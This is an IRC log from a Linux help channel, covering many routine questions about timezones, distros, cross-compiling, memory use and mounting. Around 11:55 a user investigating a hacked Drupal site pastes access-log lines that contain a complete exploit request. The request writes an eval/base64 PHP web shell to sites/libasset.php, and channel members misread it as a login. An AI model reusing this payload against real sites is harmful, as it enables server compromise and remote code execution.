"its" 07:36 < stevendale> Hey 07:37 < Dagmar> It _shouldn't_ because it makes no sense unless the thing was configured to log in a specific timezone 07:37 < p3rL> pm2 start proxy.js --name=proxy --log-date-format="YYYY-MM-DD HH:mm Z" 07:37 < p3rL> cant see any timezone 07:37 < p3rL> in this cmd 07:37 < Dagmar> It's logging in "zulu time" 07:38 < p3rL> how to change this 07:38 < p3rL> zulu time to my country time 07:38 < p3rL> or /etc/localtime 07:38 < Dagmar> If it's logging in UTC then you can use date to just convert those 07:38 < blaztek> p3rL: does: TZ=Asia/Qatar pm2 start proxy.js --name=proxy --log-date-format="YYYY-MM-DD HH:mm Z" work? 07:38 < topicali> p3rL: try this command: sudo dpkg-reconfigure tzdata 07:38 < Dagmar> But... it's not actually all that great an idea to store time-based information like that in a localized forma 07:39 < Dagmar> t 07:40 < topicali> or sudo timedatectl set-timezone 07:41 < topicali> to show the available timezones: timedatectl list-timezones 07:41 < p3rL> my timezone is changed in my vps 07:41 < Dagmar> Shouldn't be necessary. /etc/localtime is _the_ thing that sets the timespec system wide 07:41 < p3rL> but its not changed in the proxy server 07:42 < Dagmar> No one in their right mind _doesn't_ use the glibc functions, and they read those files for you 07:44 < Dagmar> Frankly you should just be glad it doesn't use the weird ISO-spec format 07:44 < Dagmar> You can use the date command to actually convert those to your local timezone and vice-versa 07:46 < p3rL> oh GOD still paris time xD 07:46 < p3rL> am gonna kill it :| 07:54 < p3rL> finally i did it 07:54 < p3rL> tnx 07:54 < p3rL> : )) 07:54 < blaztek> awesome! 07:54 < sauvin> p3rL, "thanks", please. 07:55 < p3rL> Thanks 07:55 < p3rL> :) 08:12 < mattfury> i need a phone 08:12 < mattfury> or a computer for free 08:12 < mattfury> anyone want to give one away ? 08:12 < stevendale> mattfury: What for? 08:13 < jim> that's the way you do it... play guitar on the mtv... that's the way you do it... conputer for nuthin, phone for free 08:14 < mattfury> stevendale: so i can communicate 08:14 < bookworm> teenagers this days... gosh 08:14 < stevendale> When I was younger, I wanted something, I kept asking Jesus Christ for it, but it never came... so I stole one and asked for forgiveness instead 08:15 < bookworm> these* 08:15 < Pentode> several first world nations have programs where you can get free computers if you have no money... try one of those. 08:16 < bookworm> it left 08:16 < Pentode> oh good 08:17 < junka> stevendale; LOL 08:37 < Slimmy> So I want to solve a challenge. There is this elf file that needs a password to output me a flag. After using strace I have a suspicion about the passowrd. However it reads it as "pass\n" while password is probably pass. Any idas? 08:47 < geirha> it'll likely trim off that newline, but you won't see that in strace 08:50 < CrazyTux> hello, can SAP ERP be installed on CentOS? Only these platforms are supported by SAP and RHEL is one of them. https://wiki.scn.sap.com/wiki/display/ATopics/Supported+Platforms 08:50 < CrazyTux> I don't want the support. I just need to able to install and run the SAP ERP. 08:51 < ayecee> yes, but SAP won't support it if you do. 08:51 < ayecee> well then you're golden 08:51 < CrazyTux> ayecee, great. 08:51 < CrazyTux> thanks 08:51 < bipul> SAP support Suse Enterprise Linux. 08:52 < CrazyTux> bipul, can it be installed on OpenSuse Leap? 08:53 < CrazyTux> what could be the reason for SAP not supporting other platforms? other distros like Ubuntu, Debian etc? 08:54 < CrazyTux> those too are widely used Operating Systems. 08:54 < bipul> I am not sure because i have not used it. But i have seen most of the SAP products works well on Suse , after all German believes in the german product 09:04 < ayecee> something something german efficiency 09:05 < CrazyTux> ayecee, do you think OpenSuse is more efficient than others like Ubuntu and Debian? 09:06 < ayecee> i have no idea 09:06 < sauvin> I doubt it. 09:06 < novik> CrazyTux, SAP and SuSE's headquarters are right next to each other. They've been partners for a long time. SAP chooses SuSE not for technical reasons 09:06 < bipul> Or might be some business gain not to support other distros then RHEL and Suse. 09:07 < novik> And by the way, OpenSuse is not supported. Only SLES 09:08 < bipul> indeed. 09:08 < CrazyTux> ayecee, suppose you have to recommend a beginner friendly, secure distro for home and office use which one would you recommend? Opensuse or Mint? 09:09 < bipul> I would recommend OpenSuse. 09:09 < CrazyTux> bipul, any specific reasons? 09:10 < ayecee> CrazyTux: ubuntu, of course 09:10 < CrazyTux> ayecee, why? is Opensuse not beginner friendly? It has such things like Yast. 09:11 < ayecee> because i use ubuntu and i don't use opensuse 09:11 < bipul> A very helpful community + A great people + Visionary product that makes you learn a lot. 09:11 < ayecee> the source of most such recommendations 09:11 < bipul> Ubuntu is also great. 09:12 < CrazyTux> ok 09:12 < Biganon> Hi ; I liked using mount -a to mount everything (that doesn't have noauto) in /etc/fstab, the problem I have is one of the drives is a remote one, and it fails to mount at boot and therefore I can't boot 09:12 < Biganon> is there a ... failsilently option or sth like that ? 09:13 < ayecee> if there is, it's in the manpage 09:14 < Biganon> nofail ? I'll try that 09:15 < nai> is there a way to monitor ALL processes spawned on my system? basically every time a new process is created i want to get a line of output with its PID and name 09:16 < sujeet> nai: id on't think you can get a hook for that, you'll have to poll with frequency 09:17 < Mikato> i got error with running ptp precission time control protocol, with yhis command ptp4l -i ens192 -m -S i got driver rejected most general HWTSTAMP filter 09:18 < Mikato> sorry i mean with this command ptp4l -i ens192 -m -s 09:18 < nai> sujeet: the point is to catch processes that run for too short of a time to be detected, e.g. ":" 09:22 < sujeet> nai: maybe you can use inotifywait? 09:22 < sujeet> within /proc 09:23 < nai> oh, i'll try that 09:23 < sujeet> i'm not sure if it's supported for /proc or if it's a terrible idea, but it works the way you want 09:23 < sujeet> for regular files 09:24 < sauvin> I think I remember trying to use inotify on /proc without success. 09:26 < sujeet> if inotify spawns a new thread, it would be a terrible idea ;P 09:29 < Biganon> turns out I needed the _netdev option actually 09:32 < nai> sujeet: that doesn't seem to work 09:32 < nai> i'm using inotifywait -rm /proc 09:32 < nai> watches are established but i don't get any output 09:33 < sujeet> your experience seems to align with sauvin 09:33 < nai> or actually i do but it's not related to spawning processes 09:33 < nai> ah, i might have missed a few messages due to deconnection 09:34 < sujeet> nai: try a more specific directory 09:34 < sujeet> /proc might be too big 09:34 < nai> sujeet: but i want to watch for new directories appearing in /proc 09:35 < sujeet> oh, ofc yeah 09:35 < nai> i think this is a terrible idea. 09:35 < sujeet> lol 09:37 < testman> is there any irc channel for Rocks Clusters Linux? 09:40 < zeffy> for ubuntu we have command dhclient 09:40 < zeffy> but for debian ? 09:40 < azarus> zeffy: dhclient is also available in debian 09:40 < azarus> might have to install it tough. 09:41 < zeffy> when i use command it says : RTNETLINK answers: File exists 09:41 < azarus> well, do you already have a lease? 09:41 < zeffy> i dont know what lease means.. 09:41 < zeffy> im new to linux 09:41 < zeffy> try to learn it 09:42 < azarus> a "lease" is not specific to linux 09:42 < sujeet> testman: i don't think so but there's #hpc 09:42 < sujeet> perhaps some overlap for you 09:45 < CrazyTux> between KDE Plasma and Gnome 3 which is more resource hungry? 09:45 < zeffy> is there a chanel for newbee linux users ? 09:46 < Nussi> CrazyTux: that would be kde plasma IMO 09:47 < CrazyTux> Nussi, KDE uses more RAM,CPU and battery as compared to Gnome 3? 09:48 < Nussi> CrazyTux: I don't have the number, but it might be the case yeah 09:48 < cu_cucambur> How do I setup the nameserver on a bridge? 09:48 < lowin> When my HDD is mounted, something immediately read/writes to the drive as it tries to spin down, preventing the spindown. How do I catch the culprit? Nothing special is running on the hdd. it's a new external I just hooked up yesterday. The only thing is that it's encrypted with dm-crypt luks 09:49 < CrazyTux> ok 09:49 < hendrix> on my computer gnome 3 has noticeably worse fps than plasma 09:49 < azarus> cu_cucambur: 1. get on top of a bridge. 2. setup nameserver 3. ...? 4. Profit 09:50 < CrazyTux> hendrix, what? 09:51 < hendrix> frames per second 09:51 < CrazyTux> hendrix, what about the resource usage? 09:53 < hendrix> CrazyTux: haven't calculated ram or measured battery time or such 09:53 < CrazyTux> btw, how to maximize battery life on linux? 09:54 < hendrix> those are really not the desktops if you are interested or worried about that 09:54 < kopper> cu_cucambur: I've used dnsmasq and this https://jamielinux.com/docs/libvirt-networking-handbook/custom-routed-network.html 09:56 < CrazyTux> hendrix, then which desktops? 09:57 < daksdas> we 09:57 < daksdas> we 09:57 < daksdas> sepi 09:57 < daksdas> we 09:57 < daksdas> qe 09:57 < daksdas> jawab cok 09:58 < daksdas> e 09:58 < daksdas> w 09:58 < hendrix> CrazyTux: xfce,mate,lxde/qt etc. 09:59 < CrazyTux> hendrix, ok 10:02 < littlepython> how to find if a file system is read only? 10:02 < onla> using some tiling window manager might be less resource hungry, like i3 10:03 < onla> I have lubuntu that comes with lxde, and I installed i3 on top of that and use that as a window manager and it's more light than just using basic lubuntu 10:03 < onla> but there's a learning curve to tiling wm's 10:09 < geirha> littlepython: run mount and see if the filesystem entry is listed with the ro option 10:17 < milp_3> hi, are there any downsides if the deny/drop lists of iptables grow really huge over time? 10:18 < ayecee> yes 10:19 < ayecee> time to process a packet scales linearly with the number of rules to test against it. 10:22 < fofalee> when we write a compiler how do we compile it, for that architecture 10:22 < fofalee> as there is no compiler to compile for a new architecture 10:22 < milp_3> ok so i should probably modify ssh guard scripts so iptables -L doesnt take five minutes listing all blocked ips of the past years 10:23 < ayecee> fofalee: never to return, you said 10:23 < ayecee> drama queen 10:24 < fofalee> I have a doubt, how is the compiler compiled before there is none, for a new architecture-say arm raspberry pi 10:24 < milp_3> by hand? 10:24 < fofalee> how 10:24 < ayecee> one doesn't write a new compiler, one writes a new backend for the existing compiler. 10:24 < oiaohm> fofalee: ever heard of cross compliers. 10:24 < fofalee> no, hand doesn't work on the cpu 10:24 < phyrrus9> it's usually cross compiled at this point 10:24 < milp_3> i dont know, that was just a guess. but since compiling is translating it into machinecode, i guess humans could do that job too 10:25 < fofalee> dont know cross compiler 10:25 < ayecee> well then you have something new to learn about 10:25 < ayecee> that is exciting 10:25 < phyrrus9> early compilers were just small compilers that had enough functionality to compile the full compiler, and they were written in assembly 10:25 < oiaohm> fofalee: https://en.wikipedia.org/wiki/Cross_compiler 10:26 < oiaohm> fofalee: most days we don't have to start from scratch any more instead you start by building a cross complier on a platform that already works to make a binary for that platform then use that cross complier to make a native for that platform. 10:26 < milp_3> can anyone recommend some legal torrents that would benefit from more seeders? like some linux distros? im currently seeding the latest ubuntu and lxle 10:27 < fofalee> how do i learn cross compile 10:27 < fofalee> practically 10:28 < phyrrus9> cross compiling is as easy as regular compiling. You just need a cross compiler (an example is mingw-gcc or go-cross), and make sure you have a valid environment (libraries compiled for the target, frameworks, etc) 10:30 < fofalee> where is the tutorial on cross compiling, I'd like to compile as a hobby for fun 10:30 < fofalee> for my raspberry pi 10:30 < fofalee> arm 10:30 < phyrrus9> https://developer.arm.com/open-source/gnu-toolchain/gnu-rm/downloads 10:31 < phyrrus9> ARM has a toolchain you can download, or you can use something like aarch64-linux-gnu-gcc or arm-none-eabi-gcc 10:31 < fofalee> go-cross no such package on arch linux lol 10:31 < phyrrus9> it's an AUR package 10:32 < xandroid52> im i too young for being fullstack? im 17 10:32 < phyrrus9> go-cross, go-cross-all-platforms, go-cross-major-platforms 10:32 < ayecee> xandroid52: there's not an age limit on it 10:32 < phyrrus9> I had a hard time getting software dev jobs when I was 17. you have to prove a lot more than a 30 year old would, but it's possible 10:33 < ayecee> xandroid52: however it normally involves a fair amount of experience. 10:34 < xandroid52> ayecee, cool then, but i just think that when i try to find a job, i will be rejected bc "where do the kido learn xddd, o in his house, not worthy *throw him away from a window*" 10:34 < ayecee> xandroid52: look for junior positions 10:34 < phyrrus9> xandroid52: write very detailed cover letters and keep an active github page 10:34 < xandroid52> phyrrus9 , ayecee, thanks to all for the advices, i will do that 10:36 < fofalee> aur/go-cross-all-platforms 2:1.5-1 (1, 0.00) 10:36 < fofalee> Compiler and tools for the Go programming language from Google (all supported platform) 10:36 < fofalee> does it work, but it seems for go language 10:37 < fofalee> i don't know go 10:37 < phyrrus9> it's for golang, yes. I had troubles building it on my machine (arch linux, 4.9) but I tweaked it and it built for what I needed it for. CGO has issues 10:37 < ayecee> tbh, even if i ran across some 17 year old wunderkind who claimed to be a full stack developer, i'd be skeptical. I don't think that's enough years of experience to see things fail, and to clean up from that failure. 10:38 < ayecee> could be an interesting junior though. 10:39 < phyrrus9> ayecee: I'd agree, I've been on the other end of that skepticism quite a few times. I think it all comes down to the quality of management, there's a lot of people I've worked with that have 10+ years experience and know absolutely nothing, and I've met extremely talented teenagers. 10:43 < kuri0> Is aarch64 ilp32 support merged into the mainline kernel ? 10:43 < CrazyTux> can CentOS be used for laptops and desktops? there are three options for CentOS download. https://www.centos.org/download/ . I don't quite understand what are they for? 10:43 < kuri0> if so how do I enable it in the kernel config 10:43 < ayecee> yes 10:43 < ayecee> to CrazyTux 10:43 < CrazyTux> shall I download Everything ISO? 10:44 < ayecee> sure, why not 10:44 < CrazyTux> ayecee, ok. 10:44 < ayecee> seems likely that the options are described somewhere, if you look 10:46 < CrazyTux> that Everything ISO is of 8.1 GBs. 10:47 < MrElendig> netinstall is prefered 10:47 < MrElendig> that way you don't have to download everything twice 10:47 < MrElendig> sidenote: centos is not a great desktop os 10:48 < CrazyTux> ok. I just needed a linux distro that I can install and run SAP ERP on. If I can install it on Ubuntu that is fine too. 10:49 < kuri0> ubuntu is better for most users 10:49 < kuri0> larger community and more frequent updates 10:49 < kuri0> but less stable for server stuff 10:49 < MrElendig> if it *requires* centos then you could run some better distro for the desktop, and use centos in a vm for SAP ERP 10:49 < MrElendig> whatever SAP ERP is 10:49 < kuri0> containers are better than vms 10:50 < MrElendig> depends 10:50 < kuri0> you can pass x windows so its seamless 10:50 < CrazyTux> installing and running SAP ERP requires at least 200 GBs of disk space. 10:51 < MrElendig> 512gb ssd / 2tb spinning rust is fairly cheap these days 10:52 < CrazyTux> can I install Windows in Virtual Box and install SAP ERP on it considering that it requires 200 GBs of space? 10:52 < MrElendig> sure 10:52 < MrElendig> disk space is not a problem 10:53 < CrazyTux> I have a laptop that has 1 TBs HDD. 10:54 < MrElendig> 1024 > 200 so... 10:54 < CrazyTux> which version of Windows would you recommend to be installed in Virtual Box? 10:54 < MrElendig> 10 10:54 < CrazyTux> 32 bit or 64 bit? 10:54 < MrElendig> never 32bit 10:54 < TaZeR> u guys ever not able to copy and paste text from one place to another if its coming from a root terminal into a user notepad for example? 10:54 < CrazyTux> ok 10:55 < MrElendig> it is not 1998 anymore 10:55 < CrazyTux> the guy who is going to install that SAP ERP software doesn't know how to install it on a linux platform. 10:56 < CrazyTux> otherwise, I would prefer a linux distro, CentOS in VBox as well. 10:56 < MrElendig> if this is for some business then I suggest contacting someone professional to set this up 10:56 < CrazyTux> No. Just for educational purpose. 10:56 < kopper> "Just for casual ERPing" 10:57 < CrazyTux> for learning some ERP modules. 10:57 < CrazyTux> to be precise. 10:57 < MrElendig> "The worst purchase tracking software ever made. It never really works. When you think it does......you've fucked something up. 10:57 < MrElendig> I'm gonna make a software that should help make tracking purchases but in reality will cause people to not be able to finish their regular work. It shall be called ERP! 10:57 < MrElendig> -- urbandict 10:58 < paddy|> merci 10:58 < CrazyTux> lol 11:06 < djph> MrElendig: apparently he did call a professional ... who's never set it up on Linux 11:10 < anzipex> How to connect via ssh in nautilus without typing password? Should i use something like sshpass? 11:11 < first-order> Thinking of actually trying Slack all of a sudden, maybe in a VM to see if I can actually run it bare metal vs. Debian or Arch. 11:13 < first-order> Most likely will be primarily gunning for Debian or Arch, depending on what suits the hardware better, eg. Arch would suit the newest hardware better than stable Debian would due to newer software. 11:14 < first-order> While stable Debian is fine for 99.99% of all applications for the most part. 11:15 < MrElendig> anzipex: use keys 11:15 < MrElendig> anzipex: and a keyring, like gnome-keyring 11:15 < MrElendig> slackware is not a relevant distro anymore 11:16 < first-order> And uses a slightly older kernel than Stretch does. 11:16 * first-order could grab 4.14 from backports if so desired though. 11:17 < first-order> 4.9 seems to be doing the job fine considering this is fourth-gen hardware. 11:19 < first-order> And not too crazy about Gentoo's compile times unless it's being installed on hardware that can power through it like it's nothing. 11:20 < paddy|> i see 11:20 < first-order> Not going to try it on an i5-4310m. 11:20 < peetaur2> you say that like Gentoo makes compiling slower...but it's just that it forces you to compile too many things 11:21 < djph> isn't "compile all the things" kind of the point of gentoo? 11:21 < first-order> peetaur2, I'm mostly saying that it would be a pain to try on my current hardware. 11:21 < anzipex> MrElendig, well sshpass actually works well 11:21 < anzipex> sshpass -p password nautilus ssh://user@host/ 11:22 < first-order> On something like an 8-core E5 of any generation from Sandy to present, I would have no problem trying Gentoo out because of knowing the CPU can breeze through compiling everything. 11:23 < paddy|> people have built gentoo on athlon32 machines without any moaning 11:23 < first-order> At least I'd hope, at 8c/16t. 11:23 < paddy|> your luxury problems are sad 11:23 < iflema> first-order: you dont sit around compiling all day... maybe on the day(s) you install the system 11:23 < iflema> if you test gentoo your mad 11:24 < first-order> Wouldn't entirely call a 4th-gen mobile i5 luxurious by any stretch. 11:24 < MrElendig> anzipex: you should not use passwords, you should use keys 11:24 < MrElendig> anzipex: only time you should use password auth with ssh, is with two factor from insecure devices 11:24 < first-order> A desktop i3 of the same generation can beat it. 11:25 < MrElendig> first-order: eh, not always, and not at the same freq 11:25 < MrElendig> the desktop i3 has not ht, unlike the mobile i5 11:26 < first-order> 4th-gen was hyperthreaded still. 11:26 < anzipex> MrElendig, hm.. can you write command example? 11:27 < MrElendig> https://wiki.archlinux.org/index.php/SSH_keys 11:29 < first-order> Taking these results with a grain of salt, but i3-4370 has a slight lead over my i5-4310m. https://www.cpubenchmark.net/compare/Intel-i3-4370-vs-Intel-i5-4310M/2351vs2235 11:31 < first-order> Next step up from my CPU doesn't bench much better. 11:31 < blaztek> first-order: because it’s 1 GHz higher? 11:31 < blaztek> The i3 I mean 11:32 < first-order> Or the i3's a desktop part and has bigger cores maybe vs. the i5. 11:32 < onla> Is there any explanation that on this one server running a web server some files were renamed or removed. There is no index.php but only index.php~ and also some other php files that only has the ~ at the end and not the actual file 11:33 < onla> this happened sometime last night 11:33 < first-order> Which is a mobile part. 11:33 < blaztek> onla: ~ means backup...the old one 11:34 < blaztek> first-order: makes sense. thank you! 11:34 < first-order> If I really wanted to make this laptop powerful, I'd need to do a board swap to a board that has a dGPU and thus supports a quad-core chip. 11:34 < onla> blaztek: what can make this happen? 11:36 < peetaur2> or just get a desktop and build there 11:36 < blaztek> onla: depends...did you upgrade your php stuff? 11:37 < MrElendig> onla: better check your auth logs 11:37 < onla> I am not responsible for the server. I tried asking the admin there that there is a 403 forbidden error on the page that did they update something before I checked what was going on. He just replied that index.php is missing. I guess I ask them again, if a php upgrade could remove index.php file 11:38 < onla> MrElendig: hmm ok, I'll ask them to check those too. What are auth logs btw, if I want to be more precise to them in the e-mail 11:38 < first-order> At that point, I could either grab one of these, https://www.ebay.com/itm/Dell-Precision-M6800-i7-4800MQ-2-70GHz-8GB-180GB-SSD-500GB-HDD-FirePro-M6100/123084437411?epid=1663085425&hash=item1ca86777a3:g:EBwAAOSwSlRa0rhx or an older E5 Thinkstation and a GTX1060, and get a machine that will destroy this E6440. 11:38 < blaztek> onla: it should have put a new index.php in it’s place 11:38 < MrElendig> onla: authentication, "who logged in when" etc 11:39 < MrElendig> upgrading php should not touch your site dirs 11:39 < onla> On that server there is a vulnerable drupal installation btw that we got notification some week or two ago 11:39 < blaztek> MrElendig: no, it shouldn’t. I meant the php app. 11:40 < onla> we didn't upgrade/move that vulnerable drupal yet because busy with other stuff. So maybe I should just ask about auth logs, if php upgrade wouldn't touch index.php or other files 11:40 < MrElendig> onla: you should hire extra staff to deal with security in a timely manner then 11:40 < onla> but this index.php was removed from a subdir, not the actual drupal installation dir 11:40 < MrElendig> or outsource it 11:40 < onla> yeh 11:41 < MrElendig> (or atleast change policy to security > *) 11:43 < onla> oh wait, there are some logs provided in the admin panel at the webhotel. I'll check those first 11:44 < MrElendig> my experience with web hotels is that they are usually even worse at security than their customers :p 11:54 < onla> suspicious stuff at the log! I guess someone penetrated this vulnerable drupal. I just downloaded the whole drupal to my ubuntu disk. I wonder if I downloaded some malicious code too and I should remove them and work with them only at some disk that's not my home computer and I know what I am doing 11:55 < onla> 83.220.169.119 - - [19/Apr/2018:02:36:14 +0300] "POST /?q=user/password&name%5B%23suffix%5D=%3C%3Fphp+if%28%40isset%28%24_SERVER%5BHTTP_15E2D%5D%29%29%7B%40eval%28base64_decode%28%24_SERVER%5BHTTP_15E2D%5D%29%29%3B%7Dexit%3B%3F%3E&name%5B%23markup%5D=sites%2Flibasset.php&name%5B%23type%5D=markup&name%5B%23post_render%5D%5Bpost%5D=file_put_contents HTTP/1.1" 200 3618 "-" "Mozilla/5.0 (compatible; MSIE 9.0; 11:55 < onla> Windows NT 6.1; Trident/5.0)" 11:55 < onla> 83.220.169.119 - - [19/Apr/2018:02:36:15 +0300] "POST /?q=file%2Fajax%2Fname%2F%23value%2Fform-WjRjjVGshRnP3u4FpftxVEZK90KRFii6SsmtIc3F_cE HTTP/1.1" 200 1628 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 11:55 < onla> These couple lines seem weird. Usually there are just GET events 11:56 < djph> looks like a login event ... 11:58 < onla> hmm ok. can you tell from those lines that the login was succesful? I can try verify if someone from the known users tried logging in at that time 11:59 < djph> onla: no idea, although the '200' is usually an "all's well" response 11:59 < onla> that ip only after those 2 lines did one GET event for /sites/libasset.php then next events are 30 mins later from bingbot and google bots etc 12:07 < onla> I just logged into the website using the /user page (basic drupal login page) and it adds much more lines to the log file and the POST line looks way different too: 2001:999:40:d482:9992:1990:51bd:b6a1 - - [19/Apr/2018:13:02:10 +0300] "POST /user HTTP/1.1" 302 541 "/user" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) QtWebEngine/5.9.3 Chrome/56.0.2924.122 Safari/537.36" 12:08 < onla> much less info 12:09 < peetaur2> onla: when unsure, quarantine any executable code (which could be in buffer overflows in jpeg files, etc. too) 12:17 < loganlee> hmmmm 12:24 < p3rL> any one know how to load sopel modules 12:27 < loganlee> linux is cool... 12:27 < Myrl-saki> Is there a soft limit per-process RAM usage? 12:28 < Myrl-saki> One of my processes just got OOME'd when the process's RAM usage was 75% of the total 12:29 < MrElendig> that can be configured 12:29 < loganlee> hmmmmm 12:30 < loganlee> my desktop manager got stuck with a crappy version of openstep :( 12:30 < Myrl-saki> My `ulimit -a` gives me 16 GiB. 12:30 < loganlee> oh well... 12:30 < Myrl-saki> -l: locked-in-memory size (kbytes) 16384 12:31 < Myrl-saki> Oh wait, that's 16 MiB? 12:31 < Myrl-saki> But that doesn't look like RAM limit to me 12:34 < hiya> I am using Debian GNU/Linux with i5-4th gen processor based laptop with 4 GB RAm, I just upgraded to Samsung EVO SSD, it is quite fast now, but I want to know my Memory [RAM] uses is always 90percent above and is touching 97percent frequently. Also I see gedit and terminal missing or automatically closed at times. Could it be the reason? Should I get 8GB Ram now? 12:35 < BCMM> hiya: what measure of "used" ram are you using? 12:35 < tomato> hiya: 4GB should be more than enough, are you running any memory-heavy applications? 12:35 < BCMM> hiya: it it actual memory usage, or is it this problem? https://www.linuxatemyram.com/ 12:37 < hiya> tomato, BCMM my RAM uses is up and down frequently from 3.4 to 3.65 GB out of 3.8 GB RAM in total, just now i checked with free -m and I got 144 MB available 12:38 < BCMM> hiya: ah, as long as you're looking at "available" instead of "free", what I said above does not apply 12:38 < hiya> tomato, I am using Firefox (with skype,youtube), Thunderbird, Hexchat, Tor(command line service not browser) all the time 12:38 < BCMM> hiya: if you hit 100% used memory, and something tries to allocate memory, an application will be automatically killed to free up memory 12:39 < BCMM> hiya: so that could very well be why gedit is quitting. when this happens, there should be a record of it in dmesg 12:39 < djph> BCMM: well, swap, then oom killer 12:39 < tomato> hiya: the "skype, youtube" part may be what's filling your memory 12:39 < hiya> BCMM, So that is why my terminal and gedit is missing at times when I wake up next morning 12:39 < BCMM> hiya: yes, as djph says, when i said "memory" above, that includes ram *and* any swap that's available 12:40 < BCMM> hiya: well, you can check dmesg to be sure 12:41 < BCMM> hiya: dmesg | grep "Killed process" should show it 12:41 < hiya> What should I grep from 12:41 < hiya> ok 12:41 < hiya> There is nothing right now 12:41 < hiya> Does it clear it because I rebooted? 12:41 < BCMM> yes 12:42 < hiya> # dmesg | grep kill 12:42 < hiya> [76497.295886] OOM killer disabled. 12:42 < hiya> [76498.543649] OOM killer enabled. 12:42 < hiya> Does this count? 12:44 < BCMM> huh, i wonder what did that 12:44 < noodlepie> grep -i for case insensitivity 12:44 < BCMM> disabled it and then enabled again a moment later? 12:44 < BCMM> hiya: yeah, try grep -i. it uses "Killed" not "killed" 12:45 < BCMM> hiya: by the way, have you checked what's actually using up your memory? the usage you described doesn't sound like it should be that heavy, unless you have a *lot* of tabs in firefox 12:46 < hiya> BCMM, Nothing but in System Monitor I see a Process Name called 'Web Content' with address 'firefox -contentproc childID .....' eating up 1.5GB I am not using youtube right now and I never did audio or video calls on skype, its just for text 12:47 < BCMM> hiya: yeah, firefox launches multiple processes now, for sandboxing and efficient parallelism on multi-core machines 12:48 < BCMM> hiya: oh, do you use adblock plus? 12:48 < hiya> BCMM, it takes 1.5GB? I use ublock? 12:48 < hiya> ublock origin 12:48 < BCMM> hiya: ublock is fine. 12:48 < BCMM> hiya: adp is known to use masses of ram+cpu 12:48 < hiya> Omg its 2GB right now 12:48 < BCMM> abp 12:48 < hiya> 1.7GB now 12:52 < aaa_> bcmm 12:55 < hiya> BCMM, https://media.vakil.win/u/manish/m/firefox-webcontent/ 12:55 < hiya> See the image 13:07 < gamma> a~. 13:07 < loganlee> hi gamma 13:07 < gamma> Oops 13:08 < loganlee> we have 2000 people here but very quiet 13:10 < revel> Are all of them people though? 13:11 < loganlee> no idea 13:12 < paddy|> me too 13:13 < AlexCDev> Does Posix Fork() also clone all the threads of a multithreading process? 13:13 < revel> I haven't seen a lot of them ever chat and it's not entirely impossible that a large chunk of them is just forgotten bouncers. 13:14 < funksh0n> Hi all. 13:14 < AlexCDev> funksh0n: o/ 13:15 < xandroid52> I have a question, im newbei at linux but i learn fast, would you recommend me archlinux? 13:15 < loganlee> i just use debian on virtualbox 13:16 < funksh0n> xandroid52 if you are happy to sit down with a manual and probably fail several times at just getting it installed, then yes :) 13:16 < funksh0n> I did so a couple of years ago and I've never looked back. 13:16 < xandroid52> funksh0n that doesnt motivate me, but dont stop me neither 13:17 < xandroid52> funksh0n, so you are saying that if i install arch linux i will have problems bc im newbie... mmm...probabbly, but i will try it anyway, i was told that with every distro of linux you can do whatever you want, and i m pretty sure that is right, but arch linux...i think...it may be designed for some purpose, do you know what is that purpose? 13:18 < xandroid52> That was my last question 13:18 < funksh0n> I'm saying that you will learn a lot, but there's a chance that you will break it a few times - but that's fun! 13:19 < alexandre9099> hi, why it isn't possible to mount veracrypt files as a normal user (without root access)? 13:19 < xandroid52> funksh0n i like you, that is 100% accurate, if you dont fail, you dont learn, or maybe you will learn if you dont fail too , but its more fun to fail xD 13:20 < funksh0n> alexandre9099: this should not be the case, unless you don't have permissions to access the container. 13:20 < funksh0n> If you own the veracrypt file you should be able to open it. 13:20 < alexandre9099> veracrypt asks for the administator password :/ 13:20 < alexandre9099> and i have permissions to read it 13:21 < funksh0n> veracrypt itself when you launch it, or the just when you try to mount? 13:21 < alexandre9099> when trying to mount 13:21 < alexandre9099> "Enter your user password or administrator password" 13:21 < alexandre9099> i assume that it is trying to elevate priviledges 13:22 < funksh0n> I do not get that behavior, it lets me run veracrypt and mount wihtout issue 13:23 < AlexCDev> Is it trying to decrypt the volume with the password? 13:23 < funksh0n> try changing the permission of the mountpoint? 13:23 < AlexCDev> as opposed to trying to elevate privleges 13:23 < xandroid52> funksh0n ok, i saw the installation guide, goodbye i will run debian, xsxsxssxss 13:23 < funksh0n> haha 13:23 < funksh0n> have fun xandroid52 13:23 < AlexCDev> xandroid52: Install Kubuntu <3<3<3 13:23 < AlexCDev> KDE is lovely 13:23 < alexandre9099> AlexCDev, it first asks for the container password and then admin password 13:24 < alexandre9099> i'll check files permissions 13:24 < funksh0n> alexandre9099: check permissions of the container and the mountpoint 13:24 < xandroid52> funksh0n thank you, same for u dasvidaniya 13:24 < AlexCDev> alexandre9099: ah, ok 13:24 < AlexCDev> ¯\_(ツ)_/¯ 13:24 < xandroid52> alexcdev i rather xfce 13:24 < funksh0n> i3 <3 13:24 < AlexCDev> funksh0n: blasphemy 13:24 < rangergord> anyone here using ZeroTier? (like Hamachi, but works on Linux too) How good is it? 13:25 < loganlee> restarted my machine 13:26 < alexandre9099> funksh0n AlexCDev yep, i have rw permission both my file and mountpoint (both the container and the mount point are inside a NTFS disk, not sure if that makes any difference) 13:28 < Rembo> hello everyone, i have the following issue, can someone help? https://pastebin.com/iRfktytt 13:30 < oiaohm> alexandre9099: there are odities with permissions and NTFS and Linux time to time. Also particular features some native Linux applications can support NTFS mounted under Linux does not support. 13:31 < oiaohm> alexandre9099: I know the NTFS feature limitation from people attemting to run programs under wine on NTFS and it fail and having the same application installed on ext4 work perfectly. 13:31 < alexandre9099> oiaohm, i never had problems runnining games from an NTFS drive 13:31 < FreeFull> It always feels great when X11 crashes 13:31 < FreeFull> For me it's sometimes (but not usually) when I've suspended the laptop 13:31 < oiaohm> alexandre9099: Luck. 13:32 < alexandre9099> :D might it be the problem, how can i debug this? 13:32 < oiaohm> alexandre9099: its particular programs cause wine to need particular features that NTFS drivers under Linux does not support and program breaks. 13:33 < oiaohm> alexandre9099: I would normally say test in a ext4 or other highly support file systems to rule it out. 13:33 < alexandre9099> hmm, i might create a small file just to test 13:36 < funksh0n> alexandre9099: is switching to fat32 an option? 13:36 < alexandre9099> hmm fat32 has 4GB limit of files, right? 13:36 < oiaohm> alexandre9099: fat32 is worse than ntfs for feature support. 13:38 < funksh0n> exfat maybe? 13:38 < oiaohm> funksh0n: no worse 13:39 < oiaohm> funksh0n: Linux native file systems not imported part support stuff from windows. At times you will use a loopback file on ntfs and fat32 to get around file system limitations. 13:39 < funksh0n> I'm doing 